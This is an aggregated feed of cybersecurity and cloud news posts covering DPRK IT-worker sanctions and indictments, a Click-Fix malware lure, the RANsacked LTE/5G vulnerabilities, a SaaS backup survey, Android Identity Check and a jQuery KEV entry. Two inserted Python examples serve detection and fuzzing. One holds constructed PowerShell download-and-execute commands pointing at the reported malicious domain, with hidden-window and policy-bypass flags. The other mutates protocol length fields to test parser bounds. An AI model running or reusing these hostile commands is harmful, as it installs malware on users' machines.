Sunday, January 26, 2025

Big Announcements or BIG Announcements?

At a time when many AI and Cloud announcements are happening, how can we determine which ones are important, disruptive, or just me-too? 

SHOW: 892

SHOW TRANSCRIPT: The Cloudcast #892 Transcript

SHOW VIDEO: https://youtube.com/@TheCloudcastNET 

CLOUD NEWS OF THE WEEK: http://bit.ly/cloudcast-cnotw

CHECK OUT OUR NEW PODCAST: "CLOUDCAST BASICS"

SHOW NOTES:


REACTING AND PLANNING WHEN SO MANY BIG ANNOUNCEMENTS ARE HAPPENING

  • Why is the announcement happening now?
  • What are the facts of the announcement?
  • How are Enterprises thinking about these announcements?
  • How are Enterprises thinking about how this pace of change impacts their thinking?
  • What are the technology impacts of the announcement?
  • What are the direct economic impacts of the announcement? Secondary impacts?
    • OpenAI profitability?
    • NVIDIA ability to charge premium for leading-edge chips?
    • Pricing for any AI offering (Co-Pilots, etc.)
    • Write-offs of existing GPU/Training investments?


FEEDBACK?



from The Cloudcast (.NET) https://ift.tt/Z0YLJuW
via IFTTT

Friday, January 24, 2025

The Good, the Bad and the Ugly in Cybersecurity – Week 4

The Good | OFAC Sanctions DPRK IT Workers & Attackers Linked to Salt Typhoon Treasury Attack

The U.S. Treasury Department’s OFAC issued back-to-back sanctions this week: one set targets the North Korean IT worker scheme, the other a China-based actor and firm for their roles in the recent breach of the Treasury’s own systems.

As the FBI has long cautioned, North Korean “IT warriors” pose as U.S. professionals and seek employment with IT firms to fund the heavily sanctioned regime. The DPRK relies on a network of front companies and individuals to funnel the workers’ wages back to the state, financing its weapons programs and other destabilizing activities. The scheme has generated more than $88 million in revenue over the last six years.

Sanctioned entities include Korea Osong Shipping Co., Chonsurim Trading Corporation, and Liaoning China Trade, an electronics supplier to North Korean weapons traders. The sanctions freeze any U.S.-based assets and bar transactions with the listed entities. The State Department currently offers up to $5 million for tips that help disrupt DPRK front companies.

Chinese cybersecurity firm Sichuan Juxinhe and Shanghai-based threat actor Yin Kecheng have also been sanctioned for the December attack on Treasury networks and for their ties to Salt Typhoon. OFAC describes Yin Kecheng as a prominent actor linked to China’s Ministry of State Security (MSS) and accused of targeting government agencies and critical infrastructure networks. Both the MSS and Sichuan Juxinhe reportedly had direct involvement in the Treasury attack as well as in the compromise of multiple U.S. telecom giants and internet service providers.

Investigators note that 400 laptops and desktops were compromised, giving the attackers access to thousands of sensitive files. The State Department’s Rewards for Justice program also offers up to $10 million for information that helps identify actors targeting the U.S. government and critical infrastructure.

The Bad | Fake Accounts on X Use ‘Click-Fix’ Tactic to Lure Users & Deploy Malware

News of Ross Ulbricht’s presidential pardon this week has become a lure used by threat actors on X to trick unsuspecting users into running a PowerShell command that installs malware. Discovered by vx-underground, the campaign uses a new variant of the ‘Click-Fix’ tactic that has been popular with cybercriminals over the past year.

Threat actors are observed using fake ‘verified’ Ulbricht accounts to direct X users to malicious Telegram channels that claim to be official portals. Once on Telegram, users are presented with a fake identity verification process called ‘Safeguard’, leading them to a Telegram mini-app that copies the PowerShell command to the user’s clipboard. The users are then instructed to paste and run the command in a Windows Run dialog, which triggers a script downloading a ZIP file from http://openline[.]cyou.

Source: BleepingComputer

The ZIP file contains identity-helper.exe, suspected to be a Cobalt Strike loader. Though Cobalt Strike is a legitimate penetration testing tool, it is routinely repurposed by attackers for remote access, data theft, and ransomware deployment. This version of ‘Click-Fix’ disguises malware delivery as a verification or troubleshooting step, and the language used throughout is crafted to avoid suspicion and prolong the deception.

As a best practice, never execute commands or scripts copied from unknown sources, especially via PowerShell or the Windows Run dialog, where a long one-liner scrolls out of view and is easy to run unread. When in doubt, paste the text into a text editor first and inspect it for download cradles, Base64-encoded payloads (-EncodedCommand) or other obfuscated code.
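The inspection step above can be partly automated. The following Python script is an added example (not code from the article, from vx-underground or from BleepingComputer): it takes the text a user was told to paste, decodes any -EncodedCommand payload (Base64 of UTF-16LE), extracts URLs and flags the download-and-execute indicators typical of Click-Fix cradles. The sample commands are constructed for the example; only the domain openline[.]cyou and the file name identity-helper.exe come from the report, the URL path and command structure are invented, and the scoring thresholds are an arbitrary starting point to tune.

```python
"""
Triage helper for 'Click-Fix' style paste-and-run commands.

Added example, not code from the article or the report it summarises. Given the text
a user was told to paste into the Windows Run dialog or PowerShell, it decodes any
-EncodedCommand payload, extracts URLs and flags download-and-execute indicators.
The sample commands are constructed (domain from the report, everything else invented).
"""
import base64
import re

# Indicator families; several together are typical of a download-and-execute cradle.
INDICATORS = {
    "download": re.compile(r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|curl|wget|Start-BitsTransfer)\b", re.I),
    "execute": re.compile(r"\b(iex|Invoke-Expression|Start-Process|Expand-Archive|Unblock-File|rundll32|mshta)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ExecutionPolicy)\s+bypass|-nop\b|-NoProfile\b", re.I),
    "verification_lure": re.compile(r"verif|captcha|safeguard|i am not a robot", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
KNOWN_BAD_DOMAINS = {"openline.cyou"}  # domain named in the report above


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmd: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if there is none or it is malformed."""
    m = ENC_RE.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # malformed payload: the raw text is still scanned


def domain_of(url: str) -> str:
    return re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].split(":")[0].lower()


def triage(cmd: str) -> dict:
    """Score the raw command plus its decoded payload and return a verdict with the evidence."""
    decoded = decode_encoded_command(cmd)
    text = cmd + "\n" + decoded if decoded else cmd
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    urls = URL_RE.findall(text)
    known_bad = sorted({domain_of(u) for u in urls} & KNOWN_BAD_DOMAINS)
    # arbitrary weights for the example: each indicator 1, encoding 1, a known-bad domain 2
    score = len(hits) + (1 if decoded else 0) + 2 * len(known_bad)
    if known_bad or score >= 4:
        verdict = "malicious"
    elif score >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "score": score, "indicators": hits, "urls": urls,
            "known_bad_domains": known_bad, "decoded": decoded}


# Constructed samples: the domain is from the report, the path and the rest are invented.
SAMPLE_SCRIPT = ("iwr http://openline.cyou/verify.zip -OutFile $env:TEMP\\v.zip; "
                 "Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; "
                 "Start-Process $env:TEMP\\v\\identity-helper.exe")
SAMPLE_PLAIN = f'powershell -w hidden -ep bypass -c "{SAMPLE_SCRIPT}"'
SAMPLE_ENCODED = "powershell -nop -w hidden -enc " + encode_command(SAMPLE_SCRIPT)
SAMPLE_BENIGN = "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        r = triage(sample)
        print(r["verdict"], r["score"], r["indicators"], r["known_bad_domains"], r["urls"])
```

The encoded variant matters in practice: a user looking at `-enc` followed by a Base64 blob sees nothing recognisable, so the decoder step is what exposes the cradle to the indicator checks. Domains in KNOWN_BAD_DOMAINS would normally come from a threat-intel feed rather than a hard-coded set.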

The Ugly | Attack on Educational Tech Provider Exposes 60 Million Students’ Personal Data

The threat actor behind the recent attack on PowerSchool, a cloud-based education technology provider, claims to have stolen the personally identifiable information (PII) of 62.4 million students and 9.5 million teachers across more than 6,500 U.S. and Canadian school districts.

Source: Wbay.com

The threat actor used stolen credentials to access PowerSchool’s customer support portal and downloaded data from PowerSchool SIS (student information system) databases via a maintenance tool. Investigators report that the exposed data includes Social Security Numbers, medical records, and grades, varying by district. PowerSchool’s FAQ states that it paid a ransom to prevent the data from being leaked publicly, that it has not experienced any operational disruption, and that it has seen no continued signs of unauthorized activity in its environments.

Collected reports indicate that, by number of students affected, the three hardest-hit districts are the Toronto District School Board, the Peel District School Board, and the Dallas Independent School District. According to PowerSchool representatives, the type of data exposed varies by district, following individual district or state policies.

Given those differing policies, the company notes that fewer than a quarter of impacted students had Social Security Numbers exposed. PowerSchool now provides two years of free identity protection and credit monitoring to impacted individuals and is notifying stakeholders on its customers’ behalf. A public website and a customer-only FAQ are being updated as the investigation develops.

Educational institutions remain a lucrative target because of the wealth of personal, medical, and financial information they hold. Often sold on dark-web markets and forums, this diverse data is later exploited in identity fraud, financial schemes, and blackmail.



from SentinelOne https://ift.tt/xBYS2PA
via IFTTT

RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations

Jan 24, 2025 | Ravie Lakshmanan | Telecom Security / Vulnerability

A group of academics has disclosed details of over 100 security vulnerabilities impacting LTE and 5G implementations that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network.

The 119 vulnerabilities, assigned 97 unique CVE identifiers, span seven LTE implementations – Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC, srsRAN – and three 5G implementations – Open5GS, Magma, OpenAirInterface, according to researchers from the University of Florida and North Carolina State University.

The findings have been detailed in a study titled "RANsacked: A Domain-Informed Approach for Fuzzing LTE and 5G RAN-Core Interfaces."

"Every one of the >100 vulnerabilities discussed below can be used to persistently disrupt all cellular communications (phone calls, messaging and data) at a city-wide level," the researchers said.

"An attacker can continuously crash the Mobility Management Entity (MME) or Access and Mobility Management Function (AMF) in an LTE/5G network, respectively, simply by sending a single small data packet over the network as an unauthenticated user (no SIM card required)."

The discovery is the result of a fuzzing exercise, dubbed RANsacked, undertaken by the researchers against Radio Access Network (RAN)-Core interfaces that are capable of receiving input directly from mobile handsets and base stations.

The researchers said several of the identified vulnerabilities relate to buffer overflows and memory corruption errors that could be weaponized to breach the cellular core network, and leverage that access to monitor cellphone location and connection information for all subscribers at a city-wide level, carry out targeted attacks on specific subscribers, and perform further malicious actions on the network itself.

The identified flaws fall into two broad categories: those exploitable by any unauthenticated mobile device, and those that require an adversary to have already compromised a base station or a femtocell.

Of the 119 vulnerabilities discovered, 79 were found in MME implementations, 36 in AMF implementations, and four in SGW implementations. Twenty-five shortcomings lead to Non-Access Stratum (NAS) pre-authentication attacks that can be carried out by an arbitrary cellphone.

"The introduction of home-use femtocells, followed by more easily-accessible gNodeB base stations in 5G deployments, represent a further shift in security dynamics: where once physically locked-down, RAN equipment is now openly exposed to physical adversarial threats," the study noted.

"Our work explores the implications of this final area by enabling performant fuzzing interfaces that have historically been assumed implicitly secure but now face imminent threats."
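To make the length-trusting parser bug class concrete, here is an added Python example (not code from the RANsacked paper or from any of the implementations it tested). It shows a domain-informed mutator that targets the length fields of a Type-Length-Value message rather than flipping random bits, beside a bounds-checked decoder and the trusting decoder it should replace. The TLV layout (one-byte type, one-byte length) is a simplified stand-in; the real 3GPP NAS, S1AP and NGAP encodings are not reproduced here, and the sample message is constructed.

```python
"""
Added example, not code from the RANsacked paper: a length-field-aware mutator of the
kind a domain-informed fuzzer applies to RAN-facing messages, beside a bounds-checked
decoder and the trusting decoder it should replace.

Layout (simplified stand-in, not a 3GPP encoding): 1-byte type, 1-byte length, value.
"""
import random


def encode_ies(ies):
    """Serialise [(type, value), ...] as TLV with a one-byte length."""
    out = bytearray()
    for t, v in ies:
        if not 0 <= t <= 255 or len(v) > 255:
            raise ValueError("type or value out of range for this layout")
        out += bytes((t, len(v))) + bytes(v)
    return bytes(out)


def decode_ies(buf):
    """Bounds-checked decoder: a declared length must fit inside the remaining buffer."""
    ies, i = [], 0
    while i < len(buf):
        if len(buf) - i < 2:
            raise ValueError(f"truncated IE header at offset {i}")
        t, n = buf[i], buf[i + 1]
        i += 2
        if n > len(buf) - i:
            raise ValueError(f"IE 0x{t:02x} declares {n} bytes, only {len(buf) - i} remain")
        ies.append((t, bytes(buf[i:i + n])))
        i += n
    return ies


def naive_decode(buf):
    """Trusting decoder: uses the declared length without checking it. Python slicing
    merely shortens the value; the C equivalent (memcpy of n bytes into a fixed-size
    buffer) is the overflow class the paper reports."""
    ies, i = [], 0
    while i + 2 <= len(buf):
        t, n = buf[i], buf[i + 1]
        ies.append((t, bytes(buf[i + 2:i + 2 + n])))
        i += 2 + n
    return ies


def is_rejected(buf):
    """True if the bounds-checked decoder refuses the packet."""
    try:
        decode_ies(buf)
        return False
    except ValueError:
        return True


def length_offsets(msg):
    """Offsets of the length bytes, found by walking the (valid) seed message."""
    offsets, i = [], 0
    while i + 2 <= len(msg):
        offsets.append(i + 1)
        i += 2 + msg[i + 1]
    return offsets


def mutate(msg, rng=None, kind=None):
    """Structure-aware mutations aimed at the length fields rather than random bit flips."""
    rng = rng or random.Random(0)
    b = bytearray(msg)
    kind = kind or rng.choice(["oversize", "zero", "truncate"])
    if kind == "oversize":      # length claims more bytes than the packet carries
        b[rng.choice(length_offsets(msg))] = 0xFF
    elif kind == "zero":        # length 0 shifts the parse so value bytes become IE headers
        b[rng.choice(length_offsets(msg))] = 0
    else:                       # cut the packet so an IE's value (or header) is incomplete
        del b[rng.randrange(1, len(b)):]
    return bytes(b), kind


def fuzz(seed_msg, iterations, seed=1):
    """Return how many mutated packets the bounds-checked decoder rejects."""
    rng = random.Random(seed)
    return sum(is_rejected(mutate(seed_msg, rng)[0]) for _ in range(iterations))


# Constructed sample message: three IEs with arbitrary types and values.
SAMPLE_MSG = encode_ies([(0x01, b"\x07"), (0x02, bytes(8)), (0x03, b"\x01\x02")])

if __name__ == "__main__":
    print(decode_ies(SAMPLE_MSG))
    oversized, _ = mutate(SAMPLE_MSG, kind="oversize")
    print("naive decoder accepts:", naive_decode(oversized))
    print("checked decoder rejects:", is_rejected(oversized))
    print(f"{fuzz(SAMPLE_MSG, 200)}/200 mutants rejected by the checked decoder")
```

The point of walking the seed message to find the length bytes is the "domain-informed" part: a mutator that knows where the lengths are exercises the parser's bounds handling on every iteration, where blind mutation mostly produces packets that fail an early type check. Against a real MME or AMF the harness would emit these over the S1AP/NGAP interface and watch the process for crashes; here the checked decoder stands in for the target.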

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/c7qIKur
via IFTTT

2025 State of SaaS Backup and Recovery Report

The modern workplace has undergone a seismic transformation over recent years, with hybrid work becoming the norm and businesses rapidly adopting cloud-based Software-as-a-Service (SaaS) applications to facilitate it. SaaS applications like Microsoft 365 and Google Workspace have now become the backbone of business operations, enabling seamless collaboration and productivity. However, this dependence on SaaS solutions has also attracted a surge in cyberthreats, exposing critical business data to risks like ransomware and phishing attacks.

Amid these challenges, the 2025 State of SaaS Backup and Recovery Report offers a timely analysis of the SaaS data protection landscape. By surveying over 3,700 IT professionals from diverse industries and company sizes, this report highlights trends, challenges and solutions shaping the future of SaaS data resilience. For organizations seeking clarity in navigating these turbulent waters, the findings provide invaluable guidance.

Key revelations from the report are both eye-opening and concerning. For instance, 87% of IT professionals reported experiencing SaaS data loss in 2024, with malicious deletions as the leading cause. Moreover, while 61% of applications and workloads are expected to run on public cloud platforms in the next two years, only 14% of IT leaders feel confident they can recover critical SaaS data within minutes following an incident. These findings underscore an urgent call to action for businesses to strengthen their data resilience strategies.

In this blog, we'll uncover the survey's key findings, revealing how organizations are adapting to meet the ongoing challenges. From revealing the biggest threats to understanding the strategies IT leaders are leveraging to stay ahead, you'll gain a clear picture of the trends shaping SaaS data protection.

The shift toward cloud: Major trends reshaping modern IT operations

Organizations worldwide are increasingly relying on hybrid cloud environments, with 54% of workloads and applications already cloud-hosted. This trend shows no signs of slowing down, as businesses anticipate growing this figure to 61% by 2026. The acceleration of cloud adoption reflects the critical role cloud solutions play in driving digital transformation and enabling organizations to scale effectively.

What's driving cloud adoption?

The benefits propelling rapid cloud migration are clear: leveraging cloud platforms allows organizations to enhance operational efficiency, optimize strategic analytics and support real-time decision-making. However, this enthusiasm comes with a caveat — companies are carefully navigating concerns about data sensitivity, security and compliance as they transition.

Data types moving to the cloud

Certain types of data dominate cloud migration trends, illustrating where organizations feel confident leveraging the cloud's potential. The top candidates for data migration to the cloud include:

  1. Non-sensitive analytics data (39%): Leading the pack, these datasets highlight the cloud's role in powering strategic insights.
  2. The Internet of Things (IoT) and edge data (34%): The inclusion of high-velocity datasets reflects growing trust in the cloud's ability to handle real-time analytics at scale.
  3. Sales and orders data (34%): Organizations are increasingly turning to cloud-hosted solutions to drive operational efficiency in sales processes.

Data that's staying on-premises

Despite the allure of the cloud, businesses are cautious about entrusting their most sensitive information to third-party environments. The top candidates for data to remain on-premises include:

  1. Personally identifiable information (PII) and protected health information (PHI) (42%): Strict regulations and concerns about breaches keep this data largely on-premises.
  2. Corporate financial data (42%): Companies remain wary of potential risks in the cloud for critical financial records.
  3. Sensitive intellectual property (40%): Maintaining tight control over proprietary assets remains a top priority.

Top use cases for public cloud adoption

Cloud adoption is driven by practical needs that align with modern business challenges:

  • Collaboration (39%): The flexibility and scalability of cloud solutions are essential for supporting hybrid and remote work environments.
  • Disaster recovery (37%): Ensuring fast recovery and protecting data from loss or downtime remain critical priorities.
  • Data warehousing and Database-as-a-Service (32%): Organizations value the cloud's ability to manage large datasets and enable seamless data-driven operations.

SaaS application trends in 2024

The adoption of SaaS applications continues to transform how businesses collaborate, manage operations and scale their services. Collaboration platforms remain at the forefront of SaaS adoption, reflecting their critical role in today's hybrid and remote work environments.

Microsoft 365 retains leadership while Google Workspace gains momentum

Microsoft 365 maintains its position as the leader in SaaS collaboration solutions, with a 53% adoption rate among survey respondents. However, this represents a decline from its 71% adoption rate in 2022, indicating a potential shift in preferences or increasing competition in the SaaS space.

Meanwhile, Google Workspace has seen a consistent rise in adoption, climbing to 35% in 2024 compared to 25% in 2022. This growth is particularly pronounced among SMBs, with 38% adoption compared to 32% among enterprises.

Diverging SaaS adoption trends between SMBs and enterprises

The survey also highlighted distinct preferences between SMBs and enterprise organizations when it comes to SaaS tools:

  • SMBs favor applications that simplify everyday operations and finance management, such as:
    • Google Workspace: 38% of SMBs vs. 32% of enterprises.
    • Dropbox: 26% of SMBs vs. 20% of enterprises.
    • Intuit QuickBooks: 20% of SMBs vs. 17% of enterprises.
  • Enterprises lean towards tools that support large-scale operations and customer engagement, such as:
    • Microsoft Dynamics: 32% of enterprises vs. 28% of SMBs.
    • Salesforce: 28% of enterprises vs. 22% of SMBs.
    • HubSpot: 24% of enterprises vs. 20% of SMBs.

What are the major barriers to cloud adoption?

Despite the widespread adoption of cloud solutions, many organizations face significant hurdles in migrating workloads and data to the cloud.

  • Cloud cost optimization (24%): Managing expenses during and after migration remains the top concern for organizations.
  • Compatibility and performance issues (20%): Ensuring workloads function seamlessly post-migration is another significant hurdle that causes delays and disruptions.
  • Some organizations also face difficulties with provider selection and feasibility (15%), post-migration management (14%), right-sizing cloud instances (8%), licensing complexities (7%) and managing application dependencies (5%).

The gaps IT pros can't ignore: Why confidence in recovery is low

Backup strategies are essential to securing critical SaaS data, yet IT professionals' confidence in these systems remains alarmingly low.

Backup strategy adoption across SaaS platforms

Organizations leveraging SaaS applications report varying levels of backup strategy implementation:

  • Microsoft 365: 70% have a backup strategy in place, the highest among SaaS platforms.
  • Google Workspace: 66% of users report having a backup plan, reflecting strong adoption.
  • Salesforce: Only 53% have a dedicated backup strategy, signaling a critical vulnerability.

Low confidence in backup system effectiveness

Despite the presence of backup strategies, only 40% of IT professionals expressed confidence in their systems' ability to protect critical data during a crisis. This hesitancy is fueled by:

  • Outdated backup solutions: Over 28% of respondents indicated their backup systems haven't evolved in five years, leaving them ill-equipped to handle modern-day threats.
  • Dissatisfaction with existing solutions: Nearly 30% of IT pros believe their backup and recovery tools fall short of what their organization needs.
  • Fewer than 10% of respondents feel their organization's approach to backup and disaster recovery is sufficient without requiring any changes.

What are the challenges in backup management?

Managing backups for SaaS applications presents unique challenges, varying by platform and user cohort. The survey reveals distinct pain points for users of Microsoft 365, Google Workspace and Salesforce:

  • Data recovery issues: Google Workspace (23%) and Salesforce (23%) users report the highest rates of difficulty with data recovery, compared to 20% of Microsoft 365 users.
  • Alerting and reporting: Google Workspace users (11%) are most challenged in setting up and managing alerts, surpassing Microsoft 365 (8%) and Salesforce (8%) users.
  • Compliance maintenance: Salesforce users (24%) struggle most with maintaining compliance, followed by Google Workspace (23%) and Microsoft 365 (21%).

The growing time burden of backup management

Backup management has become increasingly time-intensive for IT teams:

  • Over 50% of respondents spend more than two hours daily — equating to over 10 hours per week — on monitoring, managing and troubleshooting backups.
  • The cohort spending less than one hour daily has dropped sharply, from 39% in 2022 to 23% in 2024, while those dedicating three or more hours daily have grown from 5% in 2022 to 14% in 2024.

How organizations are securing backup infrastructure

The majority of organizations report having policies and controls in place to secure access to their backups across key areas, including public cloud (77%), servers or virtual machines (76%), SaaS applications (74%) and endpoints/PCs (73%).

While these numbers reflect a proactive approach, around 25% of organizations still lack policies and controls for backup security, presenting vulnerabilities in an increasingly hybrid and multicloud environment.

What are the major causes of SaaS data loss?

SaaS data loss remains a significant challenge, with only 13% of organizations reporting no data loss incidents in the past year. Key causes include:

  • Malicious deletion: More than 50% of organizations suffered data loss from malicious deletion, 29% were impacted by external threats and 27% by insider actions.
  • Accidental deletion: 34% of respondents experienced data loss due to human error.
  • Misconfigurations: 30% of organizations faced data loss due to improper setup or maintenance.
  • Integration issues: Conflicts with third-party applications affected 30% of respondents.
  • Technical errors: 18% experienced scripting errors, while 14% faced sync issues.

The race to recovery: How quickly can organizations restore lost SaaS data?

The ability to swiftly recover lost SaaS data is critical for minimizing downtime and avoiding costly compliance breaches. Yet, recovery times vary widely:

  • Only 14% of organizations surveyed can recover within minutes, ensuring minimal disruption.
  • Just over 40% achieve recovery within hours, meeting operational and regulatory demands.
  • About 35% require days or weeks, risking prolonged downtime and potential non-compliance.
  • Alarmingly, 8% are unsure of recovery times, and 2% cannot recover lost data at all.

Recovery of SaaS data objects

The frequency of recovering SaaS data objects is as follows:

  • Most frequently recovered:
    • Email (20%) and mail contacts (17%) are restored daily, emphasizing their critical role in communication and business continuity.
  • Least frequently recovered:
    • Calendar objects (15%) and messaging app data (16%) see fewer recovery incidents, indicating lower frequency of loss or reduced immediate operational impact.

Key takeaways and recommendations from the 2025 State of SaaS Backup and Recovery Report

The 2025 State of SaaS Backup and Recovery Report paints a vivid picture of the evolving SaaS data protection landscape. Cloud adoption continues to surge among organizations, driven by the operational efficiency and scalability of SaaS platforms. Yet, alongside these advancements lie significant challenges. From tackling data threats to addressing the complexities of backup management, the findings highlight an urgent need for businesses to rethink and modernize their data protection strategies.

On that front, businesses must adopt a comprehensive, scalable backup strategy that aligns with the complexities of today's hybrid and multicloud environments. Such a strategy should include robust data protection and rapid recovery capabilities to address SaaS data threats like accidental deletions and ransomware attacks. By investing in the right tools and practices, organizations can enhance their data resilience, minimize downtime and confidently meet the demands of an increasingly cloud-driven future.

For deeper insights into the SaaS world and actionable recommendations, download the full 2025 State of SaaS Backup and Recovery Report.

This article is a contributed piece from one of The Hacker News' partners.



from The Hacker News https://ift.tt/5ZMvtdy
via IFTTT

DoJ Indicts 5 Individuals for $866K North Korean IT Worker Scheme Violations

The U.S. Department of Justice (DoJ) on Thursday indicted two North Korean nationals, a Mexican national, and two U.S. citizens for their alleged involvement in the ongoing fraudulent information technology (IT) worker scheme, which generates revenue for the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

The action targets Jin Sung-Il (진성일), Pak Jin-Song (박진성), Pedro Ernesto Alonso De Los Reyes, Erick Ntekereze Prince, and Emanuel Ashtor. Alonso, who resides in Sweden, was arrested in the Netherlands on January 10, 2025, after a warrant was issued.

All five defendants have been charged with conspiracy to cause damage to a protected computer, conspiracy to commit wire fraud and mail fraud, conspiracy to commit money laundering, and conspiracy to transfer false identification documents. Jin and Pak have also been charged with conspiracy to violate the International Emergency Economic Powers Act. If convicted, each of them faces a maximum penalty of 20 years in prison.

The development is the latest step taken by the U.S. government to disrupt the ongoing campaign that involves North Korean nationals using forged and stolen identities to obtain remote IT work at U.S. companies through laptop farms operated within the country.

Other efforts include the August 2024 arrest of a Tennessee man for helping North Koreans land jobs in U.S. firms and the indictment of 14 DPRK nationals last month for purportedly generating $88 million over the course of a six-year conspiracy. Last week, the U.S. Treasury sanctioned two North Korean nationals and four companies based in Laos and China for their work on the IT worker scheme.

"From approximately April 2018 through August 2024, the defendants and their unindicted co-conspirators obtained work from at least sixty-four U.S. companies," the DoJ said. "Payments from ten of those companies generated at least $866,255 in revenue, most of which the defendants then laundered through a Chinese bank account."

According to the indictment document, Jin applied for a position at an unnamed U.S. IT company in June 2021 by using Alonso's identity with his consent and one of Ntekereze's New York addresses, subsequently securing the opportunity for a salary of $120,000 per year.

Ashtor's North Carolina residence, per the department, hosted a laptop farm of company-issued laptops, meant to convince employers that their new hires were located in the U.S. when the workers were in fact logging in remotely from China and Russia.

Both Ntekereze and Ashtor received laptops from U.S. employers at their homes and, without authorization, installed remote access software such as AnyDesk and TeamViewer on them to enable that remote access. They also conspired to launder payments for the IT work through a variety of accounts set up to advance the scheme and conceal its proceeds.

In furtherance of the scheme, Ntekereze is said to have used his company Taggcar Inc. to invoice a U.S. staffing company eight times, totaling about $75,709, for the IT work performed by Jin, who was masquerading as Alonso. A portion of the payment was then transferred to an online payment platform held in the name of Alonso that was accessible to both Jin and Alonso.

North Korea's wide-ranging effort to place its citizens at companies around the world is seen as an attempt to earn high-paying IT salaries that can be funneled back to the regime, and to gain access to sensitive documents that can be used as leverage for extortion.

The IT worker scam, as reiterated by the U.S. Federal Bureau of Investigation (FBI) in a separate advisory, involves the use of pseudonymous email, social media, and online job site accounts, as well as false websites, proxy computers, and witting and unwitting third-parties located in the U.S. and elsewhere.

"In recent months, in addition to data extortion, FBI has observed North Korean IT workers leveraging unlawful access to company networks to exfiltrate proprietary and sensitive data, facilitate cyber-criminal activities, and conduct revenue-generating activity on behalf of the regime," the agency said.

"After being discovered on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies meet ransom demands. In some instances, North Korean IT workers have publicly released victim companies' proprietary code."

Other instances entail the theft of company code repositories from GitHub and attempts to harvest sensitive company credentials and session cookies to initiate work sessions from non-company devices.

It's not just a U.S. phenomenon, as a new report from threat intelligence firm Nisos reveals that several Japanese firms have also landed themselves in the crosshairs of DPRK IT workers. It specifically highlighted the case of one such IT worker who has held software engineering and full-stack developer roles with different firms since January 2023.

The IT worker personas have been fleshed out digitally to lend them a veneer of legitimacy, complete with accounts on GitHub and freelance employment sites such as LaborX, ProPursuit, Remote OK, Working Not Working, and Remote Hub, as well as a personal website containing manipulated stock images.

"The individual appears to be currently employed under the name Weitao Wang at Japanese consulting company, Tenpct Inc., and appears to have been previously employed under the name Osamu Odaka at Japanese software development and consulting firm, LinkX Inc.," the company said in a report shared with The Hacker News.




from The Hacker News https://ift.tt/yfBLz0d
via IFTTT

Android's New Identity Check Feature Locks Device Settings Outside Trusted Locations

Jan 24, 2025 | Ravie Lakshmanan | Biometric / Mobile Security

Google has launched a new feature called Identity Check for supported Android devices that locks sensitive settings behind biometric authentication when outside of trusted locations.

"When you turn on Identity Check, your device will require explicit biometric authentication to access certain sensitive resources when you're outside of trusted locations," Google said in a post announcing the move.

Once enabled, biometric authentication is required for the following actions:

  • Access saved passwords and passkeys with Google Password Manager
  • Autofill passwords in apps from Google Password Manager, except in Chrome
  • Change screen lock, like PIN, pattern, and password
  • Change biometrics, like Fingerprint or Face Unlock
  • Run a factory reset
  • Turn off Find My Device
  • Turn off any theft protection features
  • View trusted places
  • Turn off Identity Check
  • Set up a new device with your current device
  • Add or remove a Google Account
  • Access Developer options

Identity Check is also designed to turn on enhanced protection for Google Accounts to prevent unauthorized individuals from taking control of any Google Account signed in on the device.

The feature is currently limited to Google's own Pixel phones with Android 15 and eligible Samsung Galaxy phones running One UI 7. It can be enabled by navigating to Settings > Google > All services > Theft protection > Identity Check.

The disclosure comes as Google has been adding a steady stream of security features to secure devices against theft, such as Theft Detection Lock, Offline Device Lock, and Remote Lock.

Google also said it has rolled out its artificial intelligence-powered Theft Detection Lock to all Android devices running Android 10 and later across the world, and that it's working with the GSMA and industry experts to combat mobile device theft by sharing information, tools and prevention techniques.

The development also follows the launch of the Chrome Web Store for Enterprises, allowing organizations to create a curated list of extensions that can be installed in employees' web browsers and minimize the risk of users installing potentially harmful or unvetted add-ons.

Last month, a spear-phishing campaign targeting Chrome extension developers was found to have inserted malicious code to harvest sensitive data, such as API keys, session cookies, and other authentication tokens from websites such as ChatGPT and Facebook for Business.

The supply chain attack is said to have been active since at least December 2023, French cybersecurity company Sekoia said in a new analysis published this week.

"This threat actor has specialised in spreading malicious Chrome extensions to harvest sensitive data," the company said, describing the adversary as persistent.

"At the end of November 2024, the attacker shifted his modus operandi from distributing his own malicious Chrome extensions via fake websites to compromising legitimate Chrome extensions by phishing emails, malicious OAuth applications, and malicious code injected into compromised Chrome extensions."




from The Hacker News https://ift.tt/DVYSL6r
via IFTTT

CISA Adds Five-Year-Old jQuery XSS Flaw to Exploited Vulnerabilities List

Jan 24, 2025 | Ravie Lakshmanan | Vulnerability / JavaScript

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday placed a now-patched security flaw impacting the popular jQuery JavaScript library to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The medium-severity vulnerability is CVE-2020-11023 (CVSS score: 6.1/6.9), a nearly five-year-old cross-site scripting (XSS) bug that could be exploited to achieve arbitrary code execution.

